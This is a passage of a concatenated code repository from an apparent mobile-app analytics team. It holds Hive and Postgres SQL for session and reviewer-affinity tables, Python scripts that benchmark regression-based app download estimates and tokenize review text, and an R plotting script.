to_date(from_utc_timestamp(s.starttime, 'America/Los_Angeles')) AS datestr,
s.device_id,
s.bundleid,
w.datestr as end_period_date
from
usage_model_selected_device_timezone_weekly w
join ios_devices device
on w.device_id = device.device_id
join vpn_sample_data_session_us s
on w.device_id = s.device_id
and s.country = 'US'
where
(
(
(endtime - starttime > 1000)
or bundleid in (
'com.google.Translate',
'com.sgn.cookiejam',
'com.bitrhymes.bingo2',
'com.weplaydots.twodots')
)
)
-- Only use sessions on active days.
and w.date = to_date(from_utc_timestamp(s.starttime, 'America/Los_Angeles'))
-- and s.datestr between '2015-03-25' and '2015-04-06'
-- limit 3
) as session
group by
session.datestr,
session.device_id,
session.bundleid
;
-- Used apps per device and week
drop table sessions_per_device_weekly;
create table sessions_per_device_weekly(
end_date string,
device_id string,
bundleid string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/bundles_devices_weekly'
;
insert overwrite table sessions_per_device_weekly
select
session.weekly_end_period_date as end_date,
session.device_id,
session.bundleid
from
period_active_weekly weekly
join app_sessions_per_device session
on weekly.end_period_date = session.weekly_end_period_date
and weekly.device_id = session.device_id
group by
session.weekly_end_period_date,
session.device_id,
session.bundleid
;
-- Used apps per device and month
drop table sessions_per_device_monthly;
create table sessions_per_device_monthly(
end_date string,
device_id string,
bundleid string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/bundles_devices_monthly'
;
insert overwrite table sessions_per_device_monthly
select
max(session.datestr) as end_date,
session.device_id,
session.bundleid
from
period_active_monthly monthly
join usage_model_selected_device_timezone_monthly active
on monthly.device_id = active.device_id
and monthly.end_period_date = active.datestr
join app_sessions_per_device session
on active.date = session.datestr
and active.device_id = session.device_id
group by
year(session.datestr),
month(session.datestr),
session.device_id,
session.bundleid
;
<file_sep>/google-analytics/rincon_dump/Libraries/CDF.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def plot_cdfs(abs_error_values_array, name='Default', title='', xlabel=''):
for index, abs_error_values in enumerate(abs_error_values_array):
if name[index] == 'Flat Model':
line_style = '--'
else:
line_style = '-'
count, bins = np.histogram(abs_error_values, bins=np.arange(0,100))
total_count = float(abs_error_values.dropna().shape[0])
plt.plot(bins[1:], 100*np.cumsum(count) / total_count, line_style, label=name[index])
ax = plt.gca()
ax.set_xlabel(xlabel)
ax.set_ylabel('% of Apps')
ax.set_title(title)
return ax
def calculate_and_plot_cdf(data, y_truth_col, y_cols, name='default', title='', xlabel=''):
abs_error_array = []
for y_col in y_cols:
abs_error_array.append(100.0 * np.abs(data[y_col] - data[y_truth_col]) / data[y_truth_col])
return plot_cdfs(abs_error_array, name=y_cols, title=title, xlabel=xlabel)
<file_sep>/sbe_benchmark/model_pv41.py
##
# KPI_analysis_ios_nonnuniv version 3
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Simulate the SBE solution on the data set Debug
# Also include the SBE error comparison with Auto_segmted SBE
##
import pandas as pd
#import os
import config
#import operator
import math
import csv
#import statsmodels.formula.api as sm
import statsmodels.regression.linear_model as sm
from sklearn.svm import SVR
import numpy as np
#from rpy import *
import matplotlib.pyplot as plt
import datetime as dt
from sklearn.cross_validation import KFold
result = None
gres = []
feed_market_format = { 0: 'Free',
1: 'Paid',
2: 'Grossing',
}
def fun(x):
if np.isnan(x):
return 0
else:
return 1/pow(float(x),2 )
def preprocess_metadata(df):
df['iphone_estimate'] = df['iphone_estimate'].fillna(0)
df['ipad_estimate'] = df['ipad_estimate'].fillna(0)
df['actual_log']=np.log(df['actual'])
df['Daily.Estimate']=df['iphone_estimate'] + df['ipad_estimate']
df['r1_log']=np.log(df['iphone_rank'])
df['r2_log']=np.log(df['ipad_rank'])
df['r1_inv']=1.0/df['iphone_rank']
df['r2_inv']=1.0/df['ipad_rank']
df['weekday'] = df['date'].apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%d').weekday())
df['isMon'] = 0
df['isTue'] = 0
df['isWed'] = 0
df['isThu'] = 0
df['isFri'] = 0
df['isSat'] = 0
df['isSun'] = 0
df['isMon'][(df['weekday'] == 0)] = 1
df['isTue'][(df['weekday'] == 1)] = 1
df['isWed'][(df['weekday'] == 2)] = 1
df['isThu'][(df['weekday'] == 3)] = 1
df['isFri'][(df['weekday'] == 4)] = 1
df['isSat'][(df['weekday'] == 5)] = 1
df['isSun'][(df['weekday'] == 6)] = 1
df['wt_rank_iphone'] = 1.0/df['iphone_rank']**2
df['wt_rank_ipad'] = 1.0/df['ipad_rank'] ** 2
df['wt_rank_iphone'] = df['wt_rank_iphone'].fillna(0)
df['wt_rank_ipad'] = df['wt_rank_ipad'].fillna(0)
df['wt_rank'] = df['wt_rank_iphone'] + df['wt_rank_ipad']
df['wt_perc'] = 1.0 / df['actual']
del df['wt_rank_iphone']
del df['wt_rank_ipad']
df = df.drop_duplicates()
return df
@profile
def main():
global result
global gres
global store_id
data_dir = '/Users/perezrafael/appannie/data/benchmark_antony'
#data_file = 'benchmark_data_143513.csv'
data_file = 'benchmark_data_143444.csv'
metadata_f = '%s/%s'%(data_dir, data_file)
sdf = pd.read_csv(metadata_f)
store_id = data_file.split('_')[2][:6]
df = preprocess_metadata(sdf)
print store_id
#df.to_csv('data_temp.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
#columns = df.columns
startdate = '2013-07-21'
enddate = '2013-07-27'
for n, g in df.groupby(['category_id', 'feed_id']):
dates = g['date'].drop_duplicates()
for date in dates:
if (date > enddate) or (date < startdate):
continue
print n, date
df_obs = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=7)).isoformat() )]
df_obs = df_obs.reset_index()
kf = KFold(len(df_obs), n_folds=5, indices=True, shuffle=True)
print('iphone_only')
test_out1 = []
try:
model_ra1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == True) & (np.isnan(df_obs['actual']) == False)))
fitted_ra1 = model_ra1.fit()
for tr, te in kf:
train = df_obs.loc[tr]
test = df_obs.loc[te]
test1 = test.dropna(subset = ['r1_log'])
test1 = test1[test1['date'] == date]
try:
model_r1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == False) & (np.isnan(train['r2_log']) == True) & (np.isnan(train['actual']) == False)))
fitted_r1 = model_r1.fit()
test1['t1e'] = np.exp(fitted_r1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
test1['t1e'] = np.exp(fitted_ra1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_out1.append(test1)
test_out1 = pd.concat(test_out1)
except:
test_out1 = df_obs[df_obs['date'] == date]
test_out1['t1e'] = None
pass
print('ipad_only')
test_out2 = []
try:
model_ra2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == True) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual']) == False)))
fitted_ra2 = model_ra2.fit()
for tr, te in kf:
train = df_obs.loc[tr]
test = df_obs.loc[te]
test2 = test.dropna(subset = ['r2_log'])
test2 = test2[test2['date'] == date]
try:
model_r2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual']) == False)))
fitted_r2 = model_r2.fit()
test2['t2e'] = np.exp(fitted_r2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
test2['t2e'] = np.exp(fitted_ra2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_out2.append(test2)
test_out2 = pd.concat(test_out2)
except:
test_out2 = df_obs[df_obs['date'] == date]
test_out2['t2e'] = None
pass
print('universal')
test_outa = []
try:
model_raa = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual']) == False)))
fitted_raa = model_raa.fit()
for tr, te in kf:
train = df_obs.loc[tr]
test = df_obs.loc[te]
testa = test.dropna(subset = ['r2_log', 'r1_log'])
testa = testa[testa['date'] == date]
try:
model_ra = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual']) == False)))
fitted_ra = model_ra.fit()
testa['tae'] = np.exp(fitted_ra.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
testa['tae'] = np.exp(fitted_raa.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_outa.append(testa)
test_outa = pd.concat(test_outa)
test_outa = test_outa[test_outa['date'] == date]
except:
test_outa = df_obs[df_obs['date'] == date]
test_outa['tae'] = None
pass
#print test_out1.columns
test_out1 = test_out1[['app_id', 'category_id', 'date', 'feed_id', 't1e']]
test_out2 = test_out2[['app_id', 'category_id', 'date', 'feed_id', 't2e']]
test_outa = test_outa[['app_id', 'category_id', 'date', 'feed_id', 'tae']]
result = df_obs.merge(test_out1, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_out2, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_outa, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
gres.append(result)
gres = pd.concat(gres)
#gres.to_csv('data_temp1.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
gres_final = gres.groupby(['store_id', 'date', 'app_id']).mean().reset_index()
print gres_final.columns
gres_final['t1e'] = gres_final['t1e'].fillna(0)
gres_final['t2e'] = gres_final['t2e'].fillna(0)
gres_final['t1e+t2e'] = gres_final['t1e'] + gres_final['t2e']
gres_final['sbe_rel_error'] = (gres_final['iphone_estimate'] + gres_final['ipad_estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['t12e_rel_error'] = (gres_final['t1e+t2e'] - gres_final['actual']).abs()*1.0/gres_final['actual']
#gres_final.insert(0, 'key', gres_final['Day'].apply(lambda x: str()) + "_" + gres_final['App.ID'].apply(lambda x: str() ))
gres_final.to_csv('/Users/antony/workspace/data_science/sbe_benchmark/res_%s_v7.csv'%store_id,index=False, quoting = csv.QUOTE_NONNUMERIC)
if False:
gres = gres.merge(gres_final, on=['Store', 'Day', 'App.ID'], how='left')
gres = gres[gres['Category_x'] ==36]
#gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['new_rel_error'] < 5)]
gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['t12e_rel_error'] < 5)]
gres_iphone = gres_iphone.sort('Rank_x_x', ascending=True)
for n, g in gres_iphone.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_x_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_x_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmted SBE')
ax.legend(loc='best')
title = 'Relative Error iPhone Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 1000)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
gres_ipad = gres[(gres['Rank_y_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['t12e_rel_error'] < 5)]
gres_ipad = gres_ipad.sort('Rank_y_x', ascending=True)
for n, g in gres_ipad.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_y_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_y_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmted SBE')
ax.legend(loc='best')
title = 'Relative Error iPad Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 400)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
# the following code build the 80-20 curve
if False:
for n, g in gres_final.groupby(['feed_id']):
fig = plt.figure()
g = g.sort('actual', ascending=False)
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('t12e_rel_error', ascending=True)
p1, = ax.plot(g['t12e_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv Univ')
ax.legend(loc=4)
if (n == 0):
title = '80-20 %s Free All Apps'%store_id
if (n == 1):
title = '80-20 %s Paid All Apps'%store_id
if (n == 2):
title = '80-20 %s Grossing All Apps'%store_id
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
#fig.savefig('%s.png'%title)
fig.savefig('LogInv_NB_Plots/%s.png'%title)
plt.close()
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('t12e_rel_error', ascending=True)
p1, = ax.plot(g['t12e_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv Univ')
ax.legend(loc=4)
if (n == 0):
title = '80-20 %s Free Top200 Apps'%store_id
if (n == 1):
title = '80-20 %s Paid Top200 Apps'%store_id
if (n == 2):
title = '80-20 %s Grossing Top200 Apps'%store_id
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
#fig.savefig('%s.png'%title)
fig.savefig('LogInv_NB_Plots/%s.png'%title)
# the following code build the Actual-Error curve
if False:
for n, g in gres_final.groupby(['feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], g['actual'], color='black', label='Actual')
ax.plot(g['actual'], (g['Daily.Estimate']), 'r.', alpha=0.4, label='SBE')
ax.plot(g['actual'], (g['tae']), 'b.', alpha=0.4, label='LogInv Univ')
ax.legend(loc='best')
title = 'ActEst %s %s July%s'%(store_id, str(int(float(n[0]))), str(int(float(n[1]))) )
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
#fig.savefig('%s.png'%title)
fig.savefig('LogInv_Plots/%s.png'%title)
print title
#plt.close()
print('Done')
pass
if __name__ == '__main__':
main()<file_sep>/icon-matching-framework/lib/queries.py
from config import DISTIMO_MATCHES_TABLE, DISTIMO_MATCHED_APPLICATIONS_TABLE
distimo_queries = {
'matches': """
select
from_appstore_id as from_market,
from_application_id as from_app_id,
to_appstore_id as to_market,
to_application_id as to_app_id
from
{matches_table}
""".format(matches_table=DISTIMO_MATCHES_TABLE),
'app_info': """
select
ma.appstore_id as market,
ma.application_id as app_id,
a.name,
a.publisher
from
{matched_applications_table} ma
join appstore.applications a
on ma.application_id = a.id
where
ma.appstore_id = 1
union all
select
ma.appstore_id as market,
ma.application_id as app_id,
a.name,
a.publisher
from
{matched_applications_table} ma
join market.applications a
on ma.application_id = a.id
where
ma.appstore_id = 2
union all
select
ma.appstore_id as market,
ma.application_id as app_id,
a.name,
a.publisher
from
{matched_applications_table} ma
join amazon.applications a
on ma.application_id = a.id
where
ma.appstore_id = 10
""".format(matched_applications_table=DISTIMO_MATCHED_APPLICATIONS_TABLE),
'matched_app_query': """
select
appstore_id as market,
application_id as app_id,
icon_url
from
{matched_applications_table}
""".format(matched_applications_table=DISTIMO_MATCHED_APPLICATIONS_TABLE)
}
app_annie_queries = {
'matches': """
with
gp_matches as (
select
*
from
dna_universal_app_mapping
where
market = 'gp'),
ios_matches as (
select
*
from
dna_universal_app_mapping
where
market = 'ios')
select
gp.app_id as from_app_id,
gp.market as from_market,
ios.app_id as to_app_id,
ios.market as to_market
from
gp_matches gp
join ios_matches ios
using(universal_app_id)
;
""",
'dblink_aa_to_aa_android': """
select
dblink_connect('aa_link',
'dbname=aa host={host} user={user} password={password}');
""",
'app_info_android': """
select
am.market,
am.app_id,
app.name,
app.company
from
dblink('aa_link',
'
select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$gp$$
') as am(universal_app_id bigint, app_id bigint, market varchar)
inner join app
on am.app_id = app.id
;
""",
'app_info_ios': """
select
am.market,
am.app_id,
app.name as name,
app.company as company
from
dna_universal_app_mapping am
join aa_app app
on am.app_id = app.id
where
am.market = 'ios'
;
""",
'matched_app_android': """
select
am.market,
am.universal_app_id,
am.app_id,
app.name,
app.company,
app.icon_url
from
dblink('aa_link',
'
select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$gp$$
') as am(universal_app_id bigint, app_id bigint, market varchar)
inner join app
on am.app_id = app.id
;
""",
'matched_app_ios': """
select
am.market,
am.universal_app_id,
am.app_id,
app.name as name,
app.company as company,
app.artwork_url as icon_url
from
dna_universal_app_mapping am
join aa_app app
on am.app_id = app.id
where
am.market = 'ios'
;
"""
}<file_sep>/old_investigations/plot_improvement.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
max_day = max(df$both_real_estimate_num, na.rm=TRUE)
# Select only when we have max days
sub_df= subset(df, (both_real_estimate_num == max_day))
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
# Calculate relative eroror and improvement.
df$CBE.Relative.Error = abs(df$Current.Best.Estimation - df$units_avg) / df$units_avg
df$SDA.Relative.Error = abs(df$estimate_avg- df$units_avg) / df$units_avg
df$SDA.Improvement = df$CBE.Relative.Error - df$SDA.Relative.Error
f <- paste('plots/',
paste(metainfo$country, metainfo$period, 'improvement.png', sep='_'), sep='')
png(file=f, width=1300, height=1700)
plot_improvement(df, metainfo, "CBE")
dev.off()
<file_sep>/audience/demographics-review/lib/text_processing.py
import nltk
import re
import string
from constants import contractions
from guess_language import guess_language
from nltk.tokenize import RegexpTokenizer
sentence_detector = nltk.data.load('tokenizers/punkt/english.pickle')
text_tokenizer = RegexpTokenizer("[a-zA-Z']+|[^\w\s]{2,}|[\d]+|[\d\-\+]{2,}")
def replace_contractions(x):
for k,v in contractions.iteritems():
x = x.replace(k, v)
return x
def guess_lang(text):
try:
return guess_language(text.decode('utf-8'))
except:
return 'UNKOWN'
def tokenize_text(text_str, ex_word_set, pattern, control):
MIN_N = 1
MAX_N = 3
text_str = text_str.lower()
text_str = replace_contractions(text_str)
text_str = text_str.replace(',', '.')
text_str = ''.join([c for c in text_str if c in control])
text_str = pattern.sub(' ', text_str)
text_sentences = sentence_detector.tokenize(text_str)
n_grams = []
for sentence in text_sentences:
sentence_tokens = text_tokenizer.tokenize(sentence)
sentence_tokens = [w for w in sentence_tokens if len(w)>1]
sentence_tokens = [w for w in sentence_tokens if not w in ex_word_set]
n_tokens = len(sentence_tokens)
for i in xrange(n_tokens):
for j in xrange(i+MIN_N, min(n_tokens, i+MAX_N)+1):
n = sentence_tokens[i:j]
#n = [re.sub(r'[^\s](.)\1\1\1+ ', r' \1\1\1 ',w) for w in n]
n_grams.append(' '.join(n))
n_grams = list(set(n_grams))
return n_grams
def tokenize_chain(review_chain, ex_word_set, pattern, control):
p = re.compile(r'<>')
review_chain = p.split(review_chain)
text_t = []
for i, val in enumerate(review_chain):
text_t = text_t + tokenize_text(val, ex_word_set, pattern, control)
return set(text_t)
<file_sep>/audience/related_apps/create_affinity.sql
\SET StartDate '2013-07-01'
\SET EndDate '2014-07-01'
---------build table aff_app_reviewer_ct
DROP TABLE IF EXISTS aff_app_reviewer_ct CASCADE;
CREATE TABLE aff_app_reviewer_ct AS
(SELECT store_id,
app_id,
Count(DISTINCT reviewer) AS reviewer_ct
FROM aa_review
WHERE reviewer != ''
AND date >= :StartDate
AND date < :EndDate
GROUP BY store_id,
app_id);
CREATE INDEX aff_app_reviewer_ct_app_id1
ON aff_app_reviewer_ct (app_id);
CREATE INDEX aff_app_reviewer_ct_store_id1
ON aff_app_reviewer_ct (store_id);
CREATE INDEX aff_app_reviewer_ct_app_id_store_id1
ON aff_app_reviewer_ct (app_id, store_id);
---------build table aff_app_reviewer_joint_ct
DROP TABLE IF EXISTS aff_app_reviewer_joint_ct CASCADE;
CREATE TABLE aff_app_reviewer_joint_ct AS
(SELECT
r1.store_id AS store_id,
r1.app_id AS app1_id,
r2.app_id AS app2_id,
Count(DISTINCT r1.reviewer) AS joint_reviewer_ct
FROM aa_review r1,
aa_review r2
WHERE r1.reviewer = r2.reviewer
AND r1.store_id = r2.store_id
AND r1.reviewer != ''
AND r1.app_id != r2.app_id
AND r1.date >= :StartDate
AND r1.date < :EndDate
AND r2.date >= :StartDate
AND r2.date < :EndDate
GROUP BY r1.store_id,
r1.app_id,
r2.app_id);
CREATE INDEX aff_app_reviewer_joint_ct_app1_id1
ON aff_app_reviewer_joint_ct (app1_id);
CREATE INDEX aff_app_reviewer_joint_ct_app2_id1
ON aff_app_reviewer_joint_ct (app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id_app1_id_app2_id1
ON aff_app_reviewer_joint_ct (store_id, app1_id, app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_app1_id_app2_id1
ON aff_app_reviewer_joint_ct ( app1_id, app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id_app1_id1
ON aff_app_reviewer_joint_ct (store_id, app1_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id_app2_id1
ON aff_app_reviewer_joint_ct (store_id, app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id1
ON aff_app_reviewer_joint_ct (store_id);
---------build table aff_results_all
DROP TABLE IF EXISTS aff_results_all CASCADE;
CREATE TABLE aff_results_all AS
(SELECT jrc.store_id,
jrc.app1_id,
rc1.reviewer_ct AS app1_reviewer_ct,
jrc.app2_id,
rc2.reviewer_ct AS app2_reviewer_ct,
jrc.joint_reviewer_ct AS joint_reviewer_ct,
CAST(jrc.joint_reviewer_ct AS FLOAT) / CAST((
rc1.reviewer_ct + rc2.reviewer_ct - jrc.joint_reviewer_ct ) AS FLOAT)
AS jaccard_index,
CAST(jrc.joint_reviewer_ct AS FLOAT) / CAST(rc2.reviewer_ct AS FLOAT)
AS companion_index
FROM aff_app_reviewer_ct rc1,
aff_app_reviewer_ct rc2,
aff_app_reviewer_joint_ct jrc
WHERE rc1.store_id = jrc.store_id
AND rc2.store_id = jrc.store_id
AND rc1.app_id = jrc.app1_id
AND rc2.app_id = jrc.app2_id
AND rc1.app_id > 10000
AND rc2.app_id > 10000);
CREATE INDEX aff_results_all_store_id1
ON aff_results_all (store_id);
CREATE INDEX aff_results_all_app1_id1
ON aff_results_all (app1_id);
CREATE INDEX aff_results_all_app2_id1
ON aff_results_all (app2_id);
CREATE INDEX aff_results_all_store_id_app1_id1
ON aff_results_all (store_id, app1_id);
CREATE INDEX aff_results_all_store_id_app2_id1
ON aff_results_all (store_id, app2_id);
CREATE INDEX aff_results_all_store_id_app1_id_app2_id1
ON aff_results_all (store_id, app1_id, app2_id);
CREATE INDEX aff_results_all_app1_id1_app2_id1
ON aff_results_all (app1_id, app2_id);
---------SELECT TOP Affinity-------
DROP TABLE IF EXISTS aff_results_top_affinity CASCADE;
SELECT s.app1_id,
a.name AS app1_name,
s.app1_reviewer_ct,
s.app2_id,
b.name AS app2_name,
s.app2_reviewer_ct,
s.joint_reviewer_ct,
s.jaccard_index,
s.rank
INTO aff_results_top_affinity
FROM (SELECT app1_id,
app1_reviewer_ct,
app2_id,
app2_reviewer_ct,
joint_reviewer_ct,
jaccard_index,
Row_number()
OVER (
partition BY app1_id
ORDER BY jaccard_index DESC, app2_id ASC) AS RANK
FROM aff_results_all
WHERE store_id = 143441
AND app1_reviewer_ct >= 100
AND joint_reviewer_ct >= 10) s
LEFT JOIN aa_app a
ON s.app1_id = a.id
LEFT JOIN aa_app b
ON s.app2_id = b.id
WHERE rank <= 20;
---------SELECT TOP Companion -------
DROP TABLE IF EXISTS aff_results_top_companion CASCADE;
SELECT s.app1_id,
a.name AS app1_name,
s.app1_reviewer_ct,
s.app2_id,
b.name AS app2_name,
s.app2_reviewer_ct,
s.joint_reviewer_ct,
s.companion_index,
s.rank
INTO aff_results_top_companion
FROM (SELECT app1_id,
app1_reviewer_ct,
app2_id,
app2_reviewer_ct,
joint_reviewer_ct,
companion_index,
Row_number()
OVER (
partition BY app1_id
ORDER BY companion_index DESC, app2_id ASC) AS RANK
FROM aff_results_all
WHERE store_id = 143441
AND app1_reviewer_ct >= 100
AND joint_reviewer_ct >= 10) s
LEFT JOIN aa_app a
ON s.app1_id = a.id
LEFT JOIN aa_app b
ON s.app2_id = b.id
WHERE rank <= 20;
<file_sep>/sbe_benchmark/find_category_scores.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import config
DATA_DIR = '/Users/perezrafael/appannie/data/loginv_results'
def plot_estimates(df):
for n, g in df.groupby(['store_id', 'feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], (g['scored_sbe_estimate']), 'ro', alpha=0.4, label='scored sbe')
ax.plot(g['actual'], (g['loginv_scored_sbe_estimate']), 'bo', alpha=0.4, label='loginv scored sbe')
ax.plot(g['actual'], (g['sbe_estimate']), 'r.', alpha=0.4, label='sbe')
ax.plot(g['actual'], (g['loginv_sbe_estimate']), 'b.', alpha=0.4, label='loginv sbe')
ax.plot(g['actual'], g['actual'], 'k-', label='actual')
ax.legend(loc='best')
title = 'ActEst %s'%str(n)
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.ylim(0, plt.xlim()[1])
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
fig.savefig('data/loginv_plots/%s.png'%title)
plt.close()
def plot_8020(df, top='All'):
df = df.dropna(subset=['actual', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error'])
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
g = g.sort('actual', ascending=False)
if top!='All':
g = g[:top]
g.sort('sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r--', label='%s %% - sbe'%t_under_20)
g.sort('scored_sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['scored_sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='%s %% - scored sbe'%t_under_20)
g.sort('loginv_sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['loginv_sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['loginv_sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b--', label='%s %% - loginv sbe'%t_under_20)
g.sort('loginv_scored_sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['loginv_scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['loginv_scored_sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='%s %% - loginv scored sbe'%t_under_20)
print n
print g[['actual', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']].describe()
ax.legend(loc=4)
title = '8020 %s top %s'%(n, top)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('data/loginv_plots/%s.png'%title)
plt.close()
def analyze_results(df):
describe = []
df2 = []
df = df.dropna(subset=['actual'])
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date']):
g = g.sort('actual', ascending=False)
g['range'] = '201 to end'
